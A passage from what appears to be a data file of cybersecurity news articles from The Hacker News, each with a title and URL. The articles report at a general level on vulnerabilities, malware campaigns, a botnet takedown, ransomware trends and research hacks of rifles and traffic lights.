""There are 100M tokens issued; the hackers stole about 37k. As I said, it is quite disconcerting, but it is not the end [of] the world. In the scheme of things, this is small,"" Middleton says.
""The tokens were stolen from me, not the token buyers. I am not downplaying the seriousness of the heist either, but I am looking at the heist for what it is. A company that we use was compromised, the vulnerability was closed, and we are investigating whether we should move against that company or not.""
At the moment, Middleton did not disclose the attack vector that was exploited to sweep out $8.4 Million in ETH, though he assured users that his team had taken necessary measures to prevent the attack from happening in the future.
Beware Coffee Lovers! StarBucks Exposed you to 3 Critical Vulnerabilities,https://thehackernews.com/2015/09/hacking-starbukcs-password.html,"Ever registered on StarBucks website? Change your passwords now!
If you are one of those Millions Starbucks customers who have registered their accounts and credit card details on StarBucks website, then your banking details are vulnerable to hackers.
An Independent Security Researcher, Mohamed M. Fouad from Egypt, has found three critical vulnerabilities on StarBucks website that could have allowed attackers to take over your account in just one click.
The vulnerabilities include:
Remote Code Execution
Remote File Inclusion lead to Phishing Attacks
CSRF (Cross Site Request Forgery)
Stealing Credit Cards Details
In case of Remote File Inclusion flaw, an attacker can inject a file from any location into the target page, which includes as a source code for parsing and execution, allowing attacker to perform:
Remote Code Execution on the company's web server
Remote Code Execution on the client-side, potentially allowing attacker to perform other attacks such as Cross-Site Scripting (XSS)
Data theft or data manipulation via Phishing attacks in an attempt to hijack customers' accounts containing credit cards details
Hijacking Starbucks Store Account Using CSRF
CSRF or Cross-Site Request Forgery is a method of attacking a website in which an intruder masquerades as a legitimate user. All attackers need to do is get the target browser to make a request to the site on their behalf, if they can either:
Convince users to click on their HTML page
Insert arbitrary HTML in a target site
In this case, an attacker can use CSRF to trick a victim into clicking a URL that changes user's store account information including account password.
This could allow the attacker to hijack victims' accounts, delete accounts or change victims' email addresses.
Video Demonstration
Fouad has also provided a video demonstration as a Proof of Concept to show the attack in work. You can watch the video given below:
In a white-hat style, Fouad reported the critical flaws to StarBucks twice but didn't get any reply from the team.
Fouad then reported the same flaws to US-CERT, which confirmed the vulnerabilities that were fixed by the StarBucks team nearly ten days ago.
However, Fouad is still waiting for the reply and his bug bounty from StarBucks team, as the company started the bug bounty program just two months ago.
Digitally Signed Bandook Malware Once Again Targets Multiple Sectors,https://thehackernews.com/2020/11/digitally-signed-bandook-malware-once.html,"A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan.
Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy ""dozens of digitally signed variants"" of the Bandook Windows Trojan over the past year, thus once again ""reigniting interest in this old malware family.""
The different verticals singled out by the threat actor include government, financial, energy, food industry, healthcare, education, IT, and legal institutions located in Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the US.
The unusually large variety of targeted markets and locations ""reinforces a previous hypothesis that the malware is not developed in-house and used by a single entity, but is part of an offensive infrastructure sold by a third party to governments and threat actors worldwide, to facilitate offensive cyber operations,"" the researchers said.
Dark Caracal's extensive use of Bandook RAT to execute espionage on a global scale was first documented by the Electronic Frontier Foundation (EFF) and Lookout in early 2018, with the group attributed to the theft of enterprise intellectual property and personally identifiable information from thousands of victims spanning over 21 countries.
The prolific group, which has operated at least since 2012, has been linked to the Lebanese General Directorate of General Security (GDGS), deeming it a nation-state level advanced persistent threat.
The concurrent use of the same malware infrastructure by different groups for seemingly unrelated campaigns led the EFF and Lookout to surmise that the APT actor ""either uses or manages the infrastructure found to be hosting a number of widespread, global cyberespionage campaigns.""
Now the same group is back at it with a new strain of Bandook, with added efforts to thwart detection and analysis, per Check Point Research.
A Three-Stage Infection Chain
The infection chain is a three-stage process that begins with a lure Microsoft Word document (e.g. ""Certified documents.docx"") delivered inside a ZIP file that, when opened, downloads malicious macros, which subsequently proceeds to drop and execute a second-stage PowerShell script encrypted inside the original Word document.
In the last phase of the attack, this PowerShell script is used to download encoded executable parts from cloud storage services like Dropbox or Bitbucket in order to assemble the Bandook loader, which then takes the responsibility of injecting the RAT into a new Internet Explorer process.
The Bandook RAT — commercially available starting in 2007 — comes with all the capabilities typically associated with backdoors in that it establishes contact with a remotely-controlled server to receive additional commands ranging from capturing screenshots to carrying out various file-related operations.
But according to the cybersecurity firm, the new variant of Bandook is a slimmed-down version of the malware with support for only 11 commands, while prior versions were known to feature as many as 120 commands, suggesting the operators' desire to reduce the malware's footprint and evade detection against high-profile targets.
That's not all. Not only valid certificates issued by Certum were used to sign this trimmed version of the malware executable, Check Point researchers uncovered two more samples — full-fledged digitally-signed and unsigned variants — which they believe are operated and sold by a single entity.
""Although not as capable, nor as practiced in operational security like some other offensive security companies, the group behind the infrastructure in these attacks seems to improve over time, adding several layers of security, valid certificates and other techniques, to hinder detection and analysis of its operations,"" the researchers concluded.
Apple update removes Java plugin from OS X browsers,https://thehackernews.com/2012/10/apple-update-removes-java-plugin-from.html,"Apple has discontinued its own Java plugin, issuing an 'update' that removes it from MacOS and encourages users to instead download Oracle's version of the software. Its another step by Apple towards making OS X safer on the web.
Mac users may have noticed that Java-based websites are displaying a ""Missing Plug-in"" notification. The Apple Support page states that this update is for OS X 10.7 and later. Apart from stripping browsers of the Java plug-in, it also removes the Java Preferences application, since it is no longer required for applet setting configuration. Just to be clear, the update does not remove Java from your system if its installed, just the Java plugin from your web browsers.
In August, Java was blasted as an unsafe plug-in that should only be used when absolutely necessary after a zero-day exploit was discovered, rolled into the user-friendly Blackhole exploit kit and used for nearly a week before Oracle issued a patch. That patch, however, also proved to be full of security bugs.
In April this year, Apple came under the scanner for Flashback malware that threatened OS X users by exploiting a vulnerability in Java. Dubbed as a BackDoor.Flashback.39 Trojan, the virus attacked over half-a-million computers.
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Several Bugs Found in 3 Open-Source Software Used by Several Businesses,https://thehackernews.com/2021/07/several-bugs-found-in-3-open-source.html,"Cybersecurity researchers on Tuesday disclosed nine security vulnerabilities affecting three open-source projects — EspoCRM, Pimcore, and Akaunting — that are widely used by several small to medium businesses and, if successfully exploited, could provide a pathway to more sophisticated attacks.
All the security flaws in question, which impact EspoCRM v6.1.6, Pimcore Customer Data Framework v3.0.0, Pimcore AdminBundle v6.8.0, and Akaunting v2.1.12, were fixed within a day of responsible disclosure, researchers Wiktor Sędkowski of Nokia and Trevor Christiansen of Rapid7 noted. Six of the nine flaws were uncovered in the Akaunting project.
EspoCRM is an open-source customer relationship management (CRM) application, while Pimcore is an open-source enterprise software platform for customer data management, digital asset management, content management, and digital commerce. Akaunting, on the other hand, is an open-source and online accounting software designed for invoice and expense tracking.
The list of issues is as follows -
CVE-2021-3539 (CVSS score: 6.3) - Persistent XSS flaw in EspoCRM v6.1.6
CVE-2021-31867 (CVSS score: 6.5) - SQL injection in Pimcore Customer Data Framework v3.0.0
CVE-2021-31869 (CVSS score: 6.5) - SQL injection in Pimcore AdminBundle v6.8.0
CVE-2021-36800 (CVSS score: 8.7) - OS command injection in Akaunting v2.1.12
CVE-2021-36801 (CVSS score: 8.5) - Authentication bypass in Akaunting v2.1.12
CVE-2021-36802 (CVSS score: 6.5) - Denial-of-service via user-controlled 'locale' variable in Akaunting v2.1.12
CVE-2021-36803 (CVSS score: 6.3) - Persistent XSS during avatar upload in Akaunting v2.1.12
CVE-2021-36804 (CVSS score: 5.4) - Weak Password Reset in Akaunting v2.1.12
CVE-2021-36805 (CVSS score: 5.2) - Invoice footer persistent XSS in Akaunting v2.1.12
Successful exploitation of the flaws could enable an authenticated adversary to execute arbitrary JavaScript code, commandeer the underlying operating system and use it as a beachhead to launch additional nefarious attacks, trigger a denial-of-service via a specially-crafted HTTP request, and even change the company associated with a user account sans any authorization.
Pimcore Customer Data Framework
Also addressed in Akaunting is a weak password reset vulnerability where the attacker can abuse the ""I forgot my password"" functionality to send a phishing email from the application to a registered user containing a malicious link that, when clicked, delivers the password reset token. The bad actor can then use the token to set a password of their choice.
""All three of these projects have real users, real customers of their attendant support services and cloud-hosted versions, and are undoubtedly the core applications supporting thousands of small to medium businesses running today,"" the researchers noted.
""For all of these issues, updating to the latest versions of the affected applications will resolve them. If updating is difficult or impossible due to external factors or custom, local changes, users of these applications can limit their exposure by not presenting their production instances to the internet directly — instead, expose them only to trusted internal networks with trusted insiders.""
Apple Crash Reports Help Hackers to create a jailbreak exploit,https://thehackernews.com/2011/12/apple-crash-reports-help-hackers-to.html,"Apple Crash Reports Help Hackers to create a jailbreak exploit
iPhone ""jailbreaking"" has been a hot topic since Apple released its smartphone more than two years ago. According to the Latest report posted by BBC that Thousands of iPhone owners have joined forces with a team of hackers to help them find new ways to jailbreak Apple's phone software & Jailbreakers use Apple crash reports to unlock iPhones.
You may be wondering and hearing alot on ""What Is Jailbreaking an Iphone? How do you do that?"" Jailbreaking is basically modifying the iPhone's firmware so that you can get access to the internals of its operating system and install a whole slew of third-party applications on your iPhone that are not otherwise available through official channels.Jailbreaking your iPhone in and of itself doesn't normally make much difference in your operation of it, but it does allow you to install other third-party applications that are not blessed by Apple.
A collective of hackers known as the iPhone Dev-Team publishes easy-to-use, cross-platform tools that allow you to install third-party apps on your iPhone that Apple won't admit into its App Store. The latest version of the iPhone's operating system is proving to be extremely hard to jailbreak fully, according to Joshua Hill, a member of the Chronic Dev hacker team.""Apple is really making it tough for us. The iPhone is now better protected than most nuclear missile facilities,"" he says.
Jailbreaking your iOS device also enables you to change your phone's behavior and even add some nifty extra features. One such feature that Apple prohibited was FaceTime or any demanding data tasks over 3G.
How Hackers Develop a Jailbreak application ? Well, Hackers like Mr Hill hunt for programming errors, or bugs, in Apple's software. Bugs may result in a program crashing or shutting down, and they are like gold dust to hackers because sometimes they can be exploited to create a jailbreak. Hackers may have to crash a particular program thousands of times as they work out how to exploit a bug successfully, but this alerts Apple that the bug exists and that hackers may be investigating it.
Phone manufacturers don't want you to do it because of the small number of cases in which it can make the phone unstable or open it up to security breaches. It then makes them look bad because it's their phone that's crashing or introducing malware to your network.
But Users Hate hate it even more because it can cost them money. They even go so far as to cripple features that the phone makers build in, so they can charge you an extra fee for the same service. One example is Wi-Fi hotspot capability, for which carriers charge up to $30 per month when you can do the same thing on a rooted phone with no extra fees using a free or low, one-time-cost app. Some carriers also don't want you running apps like Skype to make phone calls instead of using expensive cellular voice minutes.
Chronic Dev is ready to turn this little information battle into an all-out, no-holds-barred information WAR. A program called CDevreporter that iPhone users can download to their PC or Mac. The program intercepts crash reports from their phones destined for Apple and sends them to the Chronic Dev team. ""In the first couple of days after we released CDevreporter we received about twelve million crash reports,"" he says. ""I can open up a crash report and pretty much tell if it will be useful or not for developing a jailbreak, but we have so many that I am working on an automated system to help me analyse them.""
Is Jailbreaking Legal ? In July,2010 The United States government announced that jailbreaking and unlocking iPhones, rooting of Android phones and ripping DVDs (for educational purposes) is completely legal as long as they are not violating copyright law. It is also apparently not illegal to jailbreak devices in the UK, although it does invalidate product warranties, according to Simon Halberstam, technology law expert and partner at Kingsley Napley.
Apple tries to prevent jailbreaking for security reasons once a phone has been jailbroken users could unwittingly install malware that might not get past Apple's approval process. Mr Hill rejects this argument: ""I am trying to make sure that my phone is safe and your phone is safe. Apple cares about money, not your safety.""
As yet the Chronic Dev team has not announced that it has found any bugs that it can exploit, but a member of the team called pod2g claims to have found a way to create an untethered jailbreak anyway. Even if Apple fixes the bug that makes this jailbreak possible, Mr Hill is confident that the hackers will find more ways.
New Flashback malware variant found in the wild,https://thehackernews.com/2012/04/new-flashback-malware-variant-found-in.html,"New Flashback malware variant found in the wild
A new Flashback Trojan has been discovered that infects Macs without prompting the user for a password. If you haven't updated Java on your Mac, or disabled it entirely, you could be a victim. The new variant dubbed Flashback.S is actively being distributed in the wild, taking advantage of a Java vulnerability that Apple has already patched.
Flashback.S drops two files in the user's home folder, then deletes cached Java files to avoid detection. However, the researchers did not indicate what this new variant was specifically designed to do or how many computers might be infected.
At its height, the original Flashback, which was designed to grab passwords and other information from users through their web browser and other applications, was estimated to be infecting more than 600,000 Macs.
After analyzing 100,000 Macs running the firm's free anti-virus software program, Sophos discovered several Apple computers carrying Windows malware.
This is not the first time that Mac users have been hit by a Windows-style computer virus. Last year, security researchers discovered that a piece of malware, called Mac Defender, was aimed at Macs until Apple released a patch at the end of May 2011.
Why Is There A Surge In Ransomware Attacks?,https://thehackernews.com/2021/08/why-is-there-surge-in-ransomware-attacks.html,"The U.S. is presently combating two pandemics--coronavirus and ransomware attacks. Both have partially shut down parts of the economy. However, in the case of cybersecurity, lax security measures allow hackers to have an easy way to rake in millions.
It's pretty simple for hackers to gain financially, using malicious software to access and encrypt data and hold it hostage until the victim pays the ransom.
Cyber attacks are more frequent now because it is effortless for hackers to execute them. Further, the payment methods are now friendlier to them. In addition, businesses are willing to pay a ransom because of the growing reliance on digital infrastructure, giving hackers more incentives to attempt more breaches.
Bolder cybercriminals
A few years back, cybercriminals played psychological games before getting bank passwords and using their technical know-how to steal money from people's accounts. They are bolder now because it is easy for them to buy ransomware software-as-a-service and learn hacking techniques from online video-sharing sites, like YouTube. Some cyber gangs are even offering their services for a business hacking set up for a fee, typically a share of the profits.
Cryptocurrency made the hackers bolder, as they can extort unlimited and anonymous cash payments. With the anonymity of bitcoin transfers, hackers found out they can demand higher amounts from their victims.
You can also blame the rise in cyberattacks on the behavior of some firms that are willing to pay millions of dollars in bitcoin. However, attacks will stop if firms and data security experts ensure that hacking will not be profitable anymore.
Are cyber attacks getting a higher profile or actually rising?
The answer to both questions is yes. Ransomware is becoming more common because it is straightforward to execute. Hackers use software to poke around security holes or by tricking network users using phishing scam tactics like sending malware that seem to come from a trusted source. In addition, some large companies have been lax with their network security protocols, which cybersecurity experts learned recently.
One such case is the supply chain attack at Colonial Pipeline, whose CEO Joseph Blount admitted before Congress that the company does not use multifactor authentication when users log in.
Based on the Internet Crime Report released in 2020, the FBI received close to 2,500 ransomware reports in 2020, 20 percent higher than the reported cases in 2019. The FBI also noted that the collective cost of the ransomware attacks in 2020 was close to $29.1 million. It is equivalent to a 200 percent increase over 2019, wherein the cost reached $8.9 million.
Another contributing factor to the rise in ransomware attacks is the growing number of online users. The coronavirus pandemic caused a spike in worldwide internet usage. Many students and workers are working and learning remotely.
Cybercrime Magazine predicts that ransomware will cost victims about $265 billion each year starting 2031. Attacks are likely to occur every two seconds as hackers refine their malware attacks and extortion practices.
Impact of ransomware on business
We already know how ransomware can have devastating effects on businesses, large or small. But it pays to be reminded time and again because even enterprises can become victims. Cybercriminals continue to exploit vulnerabilities in network security systems. In addition, many hacking gangs are using ransomware and denial-of-service attacks for financial gains.
Aside from the increasing occurrence of ransomware attacks, the cost of the attacks is growing as well. Ransomware paralyzes a company's digital network and associated devices. Because sensitive business data is breached, business operations, particularly for supply chains, are affected--thus, companies prefer to pay a ransom.
But theoretically, even if the company pays ransom, there is no guarantee that the sensitive data has not been copied. Likewise, there is no guarantee that attackers will return all the data or that the decryption key will work. In the case of Colonial, the decryption key hackers gave them after paying the ransom was too slow. So Colonial resorted to using their backup files. Kaseya, on the other hand, preferred to work with a third party for a decryption key.
Preventing ransomware infection
The FBI advises companies never to pay ransom to cybercriminals because it encourages them to launch more attacks. Some ways to prevent such attacks include:
Working with a cybersecurity firm that provides the best security system that fits a business' current and future needs is one of your primary options.
Staying vigilant is another way to thwart infection. If your systems are slowing down for no apparent reason, disconnect from the internet and shut it down. Then, you can call your network security provider and seek their help. The Biden administration encourages businesses to beef up their cybersecurity programs and review their corporate security plans. Further, you should cooperate with the FBI and the Ransomware and Digital Extortion Task Force of the U.S. Department of Justice.
Aside from the technical aspect of assuring cybersecurity, sometimes it pays to go back to basics.
Use security training so your employees will have a better understanding of the importance and meaning of cybersecurity. In addition, employees should learn to ensure the protection of the entire company from cyber attacks.
Train yourself and your staff not to click on links from unverified sources, as phishing emails are one of the methods to spread malware and make your company an easy target. Always scan emails, and notify employees of out-of-network emails.
Practice creating regular backups of your data. Have at least two data backups and store them at separate locations. Grant access to your backup only to your most trusted staff.
Use data encryption to protect emails, file exchanges, and personal information.
Ensure that you upgrade all your applications regularly so you can fix vulnerabilities.
Use password managers to ensure that all employees will have stronger passwords. Instruct employees to use different passwords to log in to the other applications you use in your company.
Ransomware attacks are rampant, due to their ease and profitability. Knowing about the activities of cybercriminal gangs and providing employee training on cybersecurity is vital. Combining technological expertise and basic security practices will help mitigate ransomware infection. However, it's important not to panic and know the security measures you should follow.
QR codes - Next way for Android Malware,https://thehackernews.com/2011/10/qr-codes-next-way-for-android-malware.html,"Once a user scans the QR code, the code redirects them to a site that will install a Trojan on their Android smart phones. Kaspersky's SecureList blog has a report of a malicious QR code on a web site which when scanned directs the user to a URL; the linked site doesn't have a file matching the name in the URL, but it does redirect the browser to another site where the file jimm.apk is downloaded.
The file is a trojanized version of the Jimm mobile ICQ client, infected with Trojan-SMS.AndroidOS.Jifake.f which sends a number of SMS messages to a $6 a message premium rate service.
Once installed, the Trojan will send a number of SMS messages to premium-rate numbers, which will end up costing the victim some money, depending on how quickly she is able to find and remove the Trojan.
Kaspersky's Denis Maslennikov reports that the malware itself is a Trojanized Jimm application (mobile ICQ client) which sends several SMS messages to premium rate number 2476 (US$6.00 each).
THN Weekly Roundup — Top 10 Stories You Should Not Miss,https://thehackernews.com/2017/12/cybersecurity-hacking-news.html,"Here we are with our weekly roundup, briefing this week's top cybersecurity threats, incidents, and challenges, just in case you missed any of them.
Last week has been very short with big news from the theft of over 4,700 Bitcoins from the largest cryptocurrency mining marketplace to the discovery of a new malware evasion technique that works on all versions of Microsoft's Windows operating system.
Besides this, the newly discovered Janus vulnerability in the Android operating system and a critical remote code execution (RCE) vulnerability in Malware Protection Engine (MPE) for which Microsoft released an emergency patch made their places in our weekly roundup.
I recommend you to read the entire news (just click 'Read More' because there's some valuable advice in there as well).
So, here we go with the list of this Week's Top Stories:
Process Doppelgänging: New Malware Evasion Technique
A team of researchers, who previously discovered AtomBombing attack, recently revealed a new fileless code injection technique that could help malware authors defeat most of the modern anti-virus solutions and forensic tools.
Dubbed Process Doppelgänging, the method takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader, and works on all versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.
To know How Process Doppelgänging attack works and why Microsoft refused to fix it, Read More.
Android Flaw Lets Hackers Inject Malware Into Apps Without Altering Signatures
A newly discovered vulnerability, dubbed Janus, in Android could let attackers modify the code of Android apps without affecting their signatures, eventually allowing them to distribute malicious update for the legitimate apps, which looks and works same as the original apps.
Although Google has patched the vulnerability this month, a majority of Android users would still need to wait for their device manufacturers to release custom updates for them, apparently leaving a large number of Android users vulnerable to hackers for next few months.
To know more about the vulnerability, how it works and if you are affected, Read More.
Pre-Installed Keylogger Found On Over 460 HP Laptop Models
Once again, Hewlett-Packard (HP) was caught pre-installing a keylogger in more than 460 HP Notebook laptop models that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details.
When reported last month, HP acknowledged the presence of the keylogger, saying it was actually ""a debug trace"" which was left accidentally, and affected users can install updated Synaptics touchpad driver to remove it manually.
To know how to check if your HP laptop is vulnerable to this issue and download compatible drivers, Read More.
New Email Spoofing Flaw Affects Over 30 Popular Email Clients
Researchers discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms.
Dubbed MailSploit, the vulnerabilities affect popular email clients including Apple Mail (for macOS, iOS, and watchOS), Mozilla Thunderbird, Yahoo Mail, ProtonMail, several Microsoft email clients, and others.
To watch the PoC video released by the researchers and know more about the vulnerabilities, Read More.
Largest Crypto-Mining Exchange Hacked; Over $80 Million in Bitcoin Stolen
Last week was the golden week in Bitcoin's history when the price of 1 BTC touched almost $19,000, but the media hype about the bitcoin price diminishes the hack of the largest Bitcoin mining marketplace.
NiceHash mining marketplace confirmed a breach of its website, which resulted in the theft of more than 4,736 Bitcoins, which now worth nearly $80 million.
The service went offline (and is still offline at the time of writing this article) with a post on its website, confirming that ""there has been a security breach involving NiceHash website,"" and that hackers stole the contents of the NiceHash Bitcoin wallet.
To know more about the Bitcoin hack, Read More.
Microsoft Issues Emergency Windows Security Update
A week before its December Patch Tuesday updates, Microsoft released an emergency security patch to address a critical remote code execution vulnerability in its Malware Protection Engine (MPE) that could allow an attacker to take full control of a victim's PC.
The vulnerability (CVE-2017-11937) impacts Windows 10, Windows 8.1, Windows 7, Windows RT 8.1, and Windows Server, and affects several Microsoft's security products, including Windows Defender, Microsoft Security Essentials, Endpoint Protection, Forefront Endpoint Protection, and Exchange Server 2013 and 2016.
To know more about the vulnerability, Read More.
Security Flaw Left Major Banking Apps Vulnerable to MiTM Attacks Over SSL
Scientists discovered a critical implementation flaw in major mobile banking apps—for both iOS and Android—that left banking credentials of millions of users vulnerable to man-in-the-middle attacks.
Attackers, connected to the same network as the victim, could have leveraged vulnerable banking apps to intercept SSL connection and retrieve the user's banking credentials, like usernames and passwords/pincodes—even if the apps are using SSL pinning feature.
To know how attackers could have exploited this vulnerability to take over your bank accounts, Read More.
Massive Data Breach Exposes Personal Data On 31 Million Users
While downloading apps on their smartphones, most users may not realize how much data they collect on them, and app developers take advantage of this ignorance, wiping off more data on their users than they actually require for the working of their app.
But what if this data falls into the wrong hand?
The same happened last week, when a massive trove of personal data (over 577 GB) belonging to more than 31 million users of the famous virtual keyboard app, called AI.type, leaked online for anyone to download without requiring a password.
To know more about the data breach incident and what information users lost, Read More.
Critical Flaw in Major Android Tools Targets Developers
An easily-exploitable vulnerability discovered in Android application developer tools, both downloadable and cloud-based, could allow hackers to steal files and execute malicious code on vulnerable systems remotely.
The vulnerability was discovered by security researchers at CheckPoint, who also released a proof of concept (PoC) attack, dubbed ParseDroid, along with a video to demonstrate how the attack works.
To watch the video and know how this vulnerability can be exploited, Read More.
Uber Paid Florida Hacker $100,000 to Keep Data Breach News Secret
It turns out that a 20-year-old Florida man, with the help of another, was responsible for the massive Uber data breach in October 2016 and was paid an enormous amount by the ride-hailing company to destroy the data and keep the data breach incident secret.
Last week, Uber announced that a massive data breach last year exposed personal data of 57 million customers and drivers and that it paid two hackers $100,000 in ransom to destroy the information.
To know more about the data breach at Uber and the hackers, Read More.
Microsoft and Other Tech Companies Take Down TrickBot Botnet,https://thehackernews.com/2020/10/trickbot-computer-virus.html,"Days after the US Government took steps to disrupt the notorious TrickBot botnet, a group of cybersecurity and tech companies has detailed a separate coordinated effort to take down the malware's back-end infrastructure.
The joint collaboration, which involved Microsoft's Digital Crimes Unit, Lumen's Black Lotus Labs, ESET, Financial Services Information Sharing and Analysis Center (FS-ISAC), NTT, and Broadcom's Symantec, was undertaken after their request to halt TrickBot's operations was granted by the US District Court for the Eastern District of Virginia.
The development comes after the US Cyber Command mounted a campaign to thwart TrickBot's spread over concerns of ransomware attacks targeting voting systems ahead of the presidential elections next month. Attempts aimed at impeding the botnet were first reported by KrebsOnSecurity early this month.
Microsoft and its partners analyzed over 186,000 TrickBot samples, using it to track down the malware's command-and-control (C2) infrastructure employed to communicate with the victim machines and identify the IP addresses of the C2 servers and other TTPs applied to evade detection.
""With this evidence, the court granted approval for Microsoft and our partners to disable the IP addresses, render the content stored on the command and control servers inaccessible, suspend all services to the botnet operators, and block any effort by the TrickBot operators to purchase or lease additional servers,"" Microsoft said.
Since its origin as a banking Trojan in late 2016, TrickBot has evolved into a Swiss Army knife capable of pilfering sensitive information, and even dropping ransomware and post-exploitation toolkits on compromised devices, in addition to recruiting them into a family of bots.
""Over the years, TrickBot's operators were able to build a massive botnet, and the malware evolved into a modular malware available for malware-as-a-service,"" Microsoft said.
""The TrickBot infrastructure was made available to cybercriminals who used the botnet as an entry point for human-operated campaigns, including attacks that steal credentials, exfiltrate data, and deploy additional payloads, most notably Ryuk ransomware, in target networks.""
Typically delivered via phishing campaigns that leverage current events or financial lures to entice users into opening malicious file attachments or clicking links to websites hosting the malware, TrickBot has also been deployed as a second-stage payload of another nefarious botnet called Emotet.
The cybercrime operation has infected over a million computers to date.
Microsoft, however, cautioned that it did not expect the latest action to permanently disrupt TrickBot, adding that the cybercriminals behind the botnet will likely make efforts to revive their operations.
According to Swiss-based Feodo Tracker, eight TrickBot control servers, some of which were first seen last week, are still online after the takedown.
Hackers Can Remotely Hack Self-Aiming Rifles to Change Its Target,https://thehackernews.com/2015/07/self-aiming-rifle-hacking.html,"High-tech Sniper Rifles can be remotely hacked to shoot the wrong target – Something really scary and unpredictable.
Yes, Hackers can remotely gain access to the $13,000 TrackingPoint sniper rifles that run Linux and Android operating system and have Wi-Fi connections. So then they can either disable the gun or choose a wrong target.
A married pair of security researchers have proved that anything connected to the Internet can ultimately be hacked, whether computer systems, cars or… GUNS.
According to the duo, the Tracking Point's self-aiming rifle sights, better known as the ShotView targeting system, is vulnerable to WiFi-based attacks that could allow your enemy to redirect bullets to new targets of their choice.
Hacking $13,000 Self-aiming Rifles to Shoot wrong target
Runa Sandvik and her husband Michael Auger are planning to present their findings on exploiting two of the $13,000 self-aiming rifles at the Black Hat hacking conference.
In the hack, the duo demonstrates how it is possible to:
Brick the rifle, making its computer-based targeting permanently unusable
Gain root access to the targeting system to make permanent changes to the firearm
Sandvik and Auger successfully broke into the Wi-Fi-connected rifle and disabled it and, even worse, changed the weapon's target.
Slight Limitations
However, there are two minor holdbacks:
A networked attack on the rifle can not make the weapon fire because the rifle pin is controlled by a mechanical system that actually requires a finger on the trigger.
There are only around 1,000 vulnerable rifles in customers' hands.
Thankfully TrackingPoint rifles are not designed to fire automatically.
You can also watch the video demonstration in which the researchers were able to dial in changes to the scope's targeting system so accurately that they could cause a Tracking Point TP750 sniper rifle's bullet to hit straight to their own bullseye instead of the original target.
""You can make it lie constantly to the user so they'll always miss their shot,"" Sandvik told Wired while demonstrating the attack.
Texas-based TrackingPoint is known for developing high-tech self-aiming rifles to improve shooters' productivity, helping even users with no experience avoid overshoots.
Founder John McHale said the company is collaborating with Sandvik and Auger to develop a software update to patch the vulnerability.
Most Sophisticated Android malware ever detected,https://thehackernews.com/2013/06/most-sophisticated-android-malware-ever.html,"A new piece of sophisticated Android malware has been discovered by security researchers at Kaspersky Labs. Dubbed as Backdoor.AndroidOS.Obad.a, it is the most sophisticated piece of Android malware ever seen.
It exploits multiple vulnerabilities, blocks uninstall attempts, attempts to gain root access, and can execute a host of remote commands. It include complex obfuscation techniques that complicated analysis of the code, and the use of a previously unknown vulnerability in Android that allowed it to take control of and maintain a foothold on infected Android devices.
There are two previously unknown Android vulnerabilities exploited by Obad. It can gain administrator privileges, making it virtually impossible for a user to delete it off a device.
Another flaw in the Android OS relates to the processing of the AndroidManifest.xml file. This file exists in every Android application and is used to describe the application's structure, define its launch parameters.
""The malware modifies AndroidManifest.xml in such a way that it does not comply with Google standards, but is still correctly processed on a Smartphone thanks to the exploitation of the identified vulnerability,"" said Kaspersky Lab Expert. ""All of this made it extremely difficult to run dynamic analysis on this Trojan.""
Like many modern malicious programs, Obad is modular, with the ability to receive software updates directly from C&C servers controlled by the attackers.
Obad Malware is very similar to the 'Android Malware Engine', that was developed and demonstrated by Mohit Kumar (Founder, The Hacker News) last year in Malcon Conference.
Android Malware Engine has the capability to exploit more than 100's of Android platform features with command and control server that also communicate with stealthy methods to execute various evil commands and to stealing user data. The Trojan doesn't even have an interface it works entirely in background mode.
Malware enhanced with features like:
Download a file from the server and install it
Act as proxy server, HTTP server, FTP server
Stealing, Sending, Deleting and Creating text message, contacts and Call Logs.
Turning off Wi-Fi, GPS, Bluetooth, Vibration
Remote Shell, and also installing the ssh server on the device
Extracting information of all list of applications and antiviruses installed
Stealing Whatsapp conversations
Forwarding messages and calls to malicious numbers
Controlling all infected devices as bots for sms and network ddos attack
Modifying permission model and randomizing classes for making it undetectable from behaviour and signature based antivirus.
Locating victims with Live GPS locations on world map.
The researchers at Kaspersky Labs say that the Trojan has fortunately not spread a lot and have also notified Google of the above vulnerabilities on their OS, which have been exploited by the Trojan.
Android's rapid gains in the mobile space have raised concerns that the mobile OS will become a target, as Microsoft's Windows was in the PC space.
Hacking Traffic Lights is Amazingly Really Easy,https://thehackernews.com/2014/08/hacking-traffic-lights-is-amazingly_20.html,"Hacking Internet of Things (IoTs) have become an amazing practice for cyber criminals out there, but messing with Traffic lights would be something more crazy for them.
The hacking scenes in hollywood movies has just been a source of entertainment for the technology industry, like we've seen traffic lights hacked in Die Hard and The Italian Job, but these movies always inspire hackers to perform similar hacking attacks in day-to-day life.
Security researchers at the University of Michigan have not only hacked traffic light signals in real life, but also claimed that it's actually shockingly easy to perform by anyone with a laptop and the right kind of radio. If we compare the traffic light hacks in movies and real life, the reality is much easier.
In a paper study published this month, the security researchers describe how a series of major security vulnerabilities in traffic light systems allowed them to very easily and very quickly seized control of the whole system of at least 100 traffic signals in an unnamed Michigan city from a single point of access.
Researchers took permission from a local road agency before performing the hack, but they did not disclose exactly where in Michigan they did their research.
‟Our attacks show that an adversary can control traffic infrastructure to cause disruption, degrade safety, or gain an unfair advantage,"" the paper explained.
The team, led by University of Michigan computer scientist J. Alex Halderman, said that the networked traffic systems are left vulnerable to three major weaknesses:
unencrypted radio signals,
the use of factory-default usernames and passwords, and
a debugging port that is easy to attack
This left the network accessible to everyone from cyber criminals to young hackers.
""The vulnerabilities we discover in the infrastructure are not a fault of any one device or design choice, but rather show a systemic lack of security consciousness,"" the researchers report in a paper.
In an effort to save on installation costs and increase flexibility, the traffic light system makes use of wireless radio signals rather than dedicated physical networking links for its communication infrastructure - this hole was exploited by the researchers. Surprisingly, more than 40 states currently use such systems to keep traffic flowing as efficiently as possible.
""The safety critical nature of traffic infrastructure requires that it be secure against computer-based attacks, but this is not always the case,"" the team said. ""We investigate a networked traffic signal system currently deployed in the United States and discover a number of security flaws that exist due to systemic failures by the designers. We leveraged these flaws to create attacks which gain control of the system, and we successfully demonstrate them on the deployment.""
